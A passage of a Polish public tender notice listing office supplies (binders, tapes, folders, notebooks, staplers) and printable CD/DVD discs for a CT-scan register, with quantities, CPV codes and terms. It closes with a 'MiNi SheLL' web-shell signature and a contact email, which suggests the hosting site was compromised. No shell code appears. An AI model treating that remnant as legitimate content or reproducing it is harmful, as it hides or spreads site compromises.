82.	Segregator A5/ z wymienną etykietą, na dolnych krawędziach metalowe okucia, oklejony zewnatrz poliolefiną, a wewnątrz papierem, dźwignia wysokiej jakości z dociskaczem,   wzmocniony   otwór   na   palec, dwa otwory na przedniej okładce,  szerokość grzbietu 35 mm	szt.	30
83.	Segregator A5/ z wymienną etykietą, na dolnych krawędziach metalowe okucia, oklejony zewnatrz poliolefiną, a wewnątrz papierem, dźwignia wysokiej jakości z dociskaczem,   wzmocniony   otwór   na   palec, dwa otwory na przedniej okładce,  szerokość grzbietu 70 mm	szt.	10
84.	Skoroszyt A4 z PCV 20 szt/op, wpinany do segregatora, dziurkowanie pozwala na wpinanie do każdego segregatora, poj. ok. 20 kartek	op.	50
85.	Spinacze biurowe R33 /średnie/ okrągłe, niklowane pakowane po 100 szt	op.	160
86.	Spinacze biurowe R50 /duże/ okrągłe,niklowane pakowane po 100 szt	op.	30
87.	Tablica korkowa w drewnianej ramie, w komplecie elementy mocujące, wym. 90 x 120 cm	szt.	1
88.	tablica suchościeralna o lakierowanej powierzchni, po której można pisać markerami ścieranymi na sucho., rama mdf, wym. 60x90	szt.	1
89.	zestaw 4 kolorywch markerów do tablic suchościeralnych z gąbką 	komplet	3
90.	Taśma do metkownicy Biltz dwurzędowa kolorowa	szt.	90
91.	Taśma do numeratora LABEL POINT 150,  12mmx7m 1/2x23 black/white 	rolka	10
92.	Taśma dwustronna samoprzylepna 50mmx10m	szt.	9
93.	Taśma klejąca przeźroczysta 18mm x 20m	szt.	20
94.	Taśma klejąca przeźroczysta 24mm x 20m	szt.	90
95.	Taśma pakowa, brązowa  przeznaczona do klejenia   kartonów, o dobrych właściwościach klejących, wym. 48-50mm x 50m	szt.	16
96.	Taśma pakowa, przeźroczysta, przeznaczona doklejenia   kartonów, o dobrych właściwościach klejących, wym. 48-50mm x 50m	szt.	20
97.	Taśma papierowa żółta 15mm	szt.	450
98.	Teczka -format A4, wykonana na wzór koperty listowej z transparentnego polipropylenu  o grubości min. 180 mic, zamykana na zatrzask, otwierana wzdłuż długiego boku,  przeźroczysta, kolor do wyboru w trakcie składania zamówienia,  typu clear bag firmy deli lub równoważna 	szt.	250
99.	Teczka kartonowa na dokumenty format A4, z kartonu jednostronnie powlekanego, wiązana 	szt.	200
100.	Teczka kartonowa na dokumenty format A4, z kartonu jednostronnie powlekanego, z gumką 	szt.	500
101.	Teczka skrzydłowa z gumką na dokumenty o formacie A4	szt.	44
102.	Toner (tusz - wałeczek nasączony tuszem) pasujący do kalkulatora drukującego CITIZEN CX 123 (posiadanego przez Zamawiającego) drukujący w kolorze czarnym i czerwonym 	szt.	5
103.	Tusz do stępli, wodny, bezolejowy do stempli gumowych i polimerowych, kolor do wybory przy zamówieniu	szt.	28
104.	Wałki barwiące do metkownicy Blitz C 20	szt.	4
105.	Wkład wymienny do pióra żelowego z pozycji 71 grubość lini pisma: 0,6 mm	szt.	180
106.	Zakreślacz, końcówka ścięta, nieblaknący i nietoksyczny tusz na bazie wody, przeznaczony do  pisania  na  wszystkich  rodzajach  papieru,   duża odporność na wysychanie, szerokość lini 2-5 mm, kolor do wybory przy zamówieniu	szt.	24
107.	Zeszyt twarda okładka, format A5, papier o gramaturze 60g/m2, laminowany w twardej oprawie,  w kratkę, 32 kartkowy	szt.	10
108.	Zeszyt twarda okładka, format B5, papier o gramaturze 60g/m2, laminowany w twardej oprawie, w kratkę, 150 kartkowy	szt.	15
109.	Zeszyt, twarda okładka format A4, papier o gramaturze 60g/m2, laminowany w twardej oprawie,  w kratkę, 96 kartkowy	szt.	200
110.	Zeszyt, twarda okładka, format A5, papier o gramaturze 60g/m2, laminowany w twardej oprawie,  w kratkę, 96 kartkowy	szt.	200
111.	Zszywacz wykonany z tworzywa sztucznego, częsci mechaniczne z metalu, zszywa min. 25 kartek zszywkami 24/6,  minimum 2 lata gwarancji	szt.	24
112.	Zszywacz wykonany z wysokiej jakości wytrzymałego tworzywaczęsci mechaniczne z metalu,  zszywa min.   60  kartek przy  stosunkowo niewielkim  nacisku, zszywki  23/8-11, minimum 2 lata gwarancji	szt.	6
113.	Zszywki 23/8-ll z materiału wysokiej jakości, końcówki zaostrzone, aby łatwiej przebijać zszywany plik, charakteryzują się dużą wytrzymałością na rozciąganie, opakowanie 1000 szt,	op.	20
114.	sprężone powietrze do czyszczenia trudnodostępnych miesjsc w urządzeniach biurowych za pomocą wyrzucanego powietrza pod wysokim ciśnieniem, pojemnik o poj. 600 ml	op.	12
115.	Zszywki 24/6 z materiału wysokiej jakości, końcówki zaostrzone, aby łatwiej przebijać zszywany plik, charakteryzują się dużą wytrzymałością na rozciąganie, opakowanie 1000 szt., 	op.	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Płyty CD,  DVD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płyty CD  pojemność min. 700 MB, pakowane fabrycznie przez producenta po min. 50 szt. -  rodzaj pakowania: szpindel cake, płytki nie mogą się sklejać, otwory w płytkach muszą być okrągłe 	szt.	50
Płyty CD-R PRINTABLE; pojemność min. 700 MB, pakowane fabrycznie przez producenta po min. 50 szt. -  rodzaj pakowania: szpindel cake, płytki nie mogą się sklejać, otwory w płytkach muszą być okrągłe (zastosowanie do rejestru badań wykonywanywanych na Tomografie Komputerowym, w przypadku sklejania się płyt w opakowaniu dostawca zobowiązany jest do wymiany całego opakowania)	szt.	31 100
Płyty DVD-R PRINTABLE, pojemność min. 4,7 GB, pakowane fabrycznie przez producenta po min. 50 szt. -  rodzaj pakowania: szpindel cake, płytki nie mogą się sklejać, otwory w płytkach muszą być okrągłe (zastosowanie do rejestru badań wykonywanywanych na Tomografie Komputerowym, w przypadku sklejania się płyt w opakowaniu dostawca zobowiązany jest do wymiany całego opakowania)(zastosowanie do rejestru badań wykonywanywanych na Tomografie Komputerowym, w przypadku sklejania się płyt w opakowaniu dostawca zobowiązany jest do wymiany całego opakowania) (pakowane min. Po 50 szt.)	szt.	3600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.43.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com